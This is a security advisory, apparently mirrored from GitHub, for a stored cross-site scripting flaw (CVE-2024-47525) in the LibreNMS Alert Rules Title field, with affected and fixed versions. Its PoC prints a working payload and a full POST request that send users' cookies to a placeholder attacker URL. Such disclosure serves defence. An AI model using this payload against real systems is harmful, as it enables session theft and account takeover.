Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1qMmo5LTdwcjYteHF3ds4AA_50
LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Rules" feature
Summary
A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.
Details
The vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads.
For example, the following payload can be used:
test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"
This payload triggers the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present.
The vulnerability stems from the application not sanitizing the value of $rule['name'] before adding it to the $enabled_msg variable. This is evident in the code:
PoC
- Create a new alert rule in the LibreNMS interface.
- In the "Title" field, input the following payload:
test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie" - Save the rule and trigger the alert.
- Observe that when the page loads, the injected JavaScript executes and redirects the user, sending their non-httponly cookies to the attacker's server.
Example Request:
POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>
_token=<your_token>&device_id=-1&device_name=invalid+hostname&rule_id=17&type=alert-rules&template_id=&builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22not_equal%22%2C%22value%22%3A%22test2'%5C%22%22%7D%5D%2C%22valid%22%3Atrue%7D&name=test1''+autofocus+onfocus%3D%22document.location%3D'https%3A%2F%2F<attacker_url>%2Flogger.php%3Fc%3D'%2Bdocument.cookie%22&builder_rule_0_filter=access_points.accesspoint_id&builder_rule_0_operator=not_equal&builder_rule_0_value_0=test2'%22&severity=warning&count=1&delay=1m&interval=5m&recovery=on&acknowledgement=on&maps%5B%5D=1&proc=¬es=Test2'%22&override_query=on&adv_query=select+'test3'%22'%3B
Impact
It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.
Permalink: https://github.com/advisories/GHSA-j2j9-7pr6-xqwvJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qMmo5LTdwcjYteHF3ds4AA_50
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 20 days ago
Updated: 20 days ago
CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L
Identifiers: GHSA-j2j9-7pr6-xqwv, CVE-2024-47525
References:
- https://github.com/librenms/librenms/security/advisories/GHSA-j2j9-7pr6-xqwv
- https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490
- https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405
- https://nvd.nist.gov/vuln/detail/CVE-2024-47525
- https://github.com/advisories/GHSA-j2j9-7pr6-xqwv
Blast Radius: 2.3
Affected Packages
packagist:librenms/librenms
Dependent packages: 1Dependent repositories: 2
Downloads: 51,107 total
Affected Version Ranges: < 24.9.0
Fixed in: 24.9.0
All affected versions: 1.20.1, 1.22.1, 1.30.1, 1.31.1, 1.31.2, 1.31.3, 1.32.1, 1.33.1, 1.36.1, 1.42.1, 1.48.1, 1.50.1, 1.53.1, 1.58.1, 1.62.1, 1.62.2, 1.64.1, 1.65.1, 1.70.0, 1.70.1, 21.1.0, 21.2.0, 21.3.0, 21.4.0, 21.5.0, 21.5.1, 21.6.0, 21.7.0, 21.8.0, 21.9.0, 21.9.1, 21.10.0, 21.10.1, 21.10.2, 21.11.0, 21.12.0, 21.12.1, 22.1.0, 22.2.0, 22.2.1, 22.2.2, 22.3.0, 22.4.0, 22.4.1, 22.5.0, 22.6.0, 22.7.0, 22.8.0, 22.9.0, 22.10.0, 22.11.0, 22.12.0, 23.1.0, 23.1.1, 23.2.0, 23.4.0, 23.4.1, 23.5.0, 23.6.0, 23.7.0, 23.8.0, 23.8.1, 23.8.2, 23.9.0, 23.9.1, 23.10.0, 23.11.0, 24.1.0, 24.2.0, 24.3.0, 24.4.0, 24.4.1, 24.5.0, 24.6.0, 24.7.0, 24.8.0, 24.8.1
All unaffected versions: 24.9.0, 24.9.1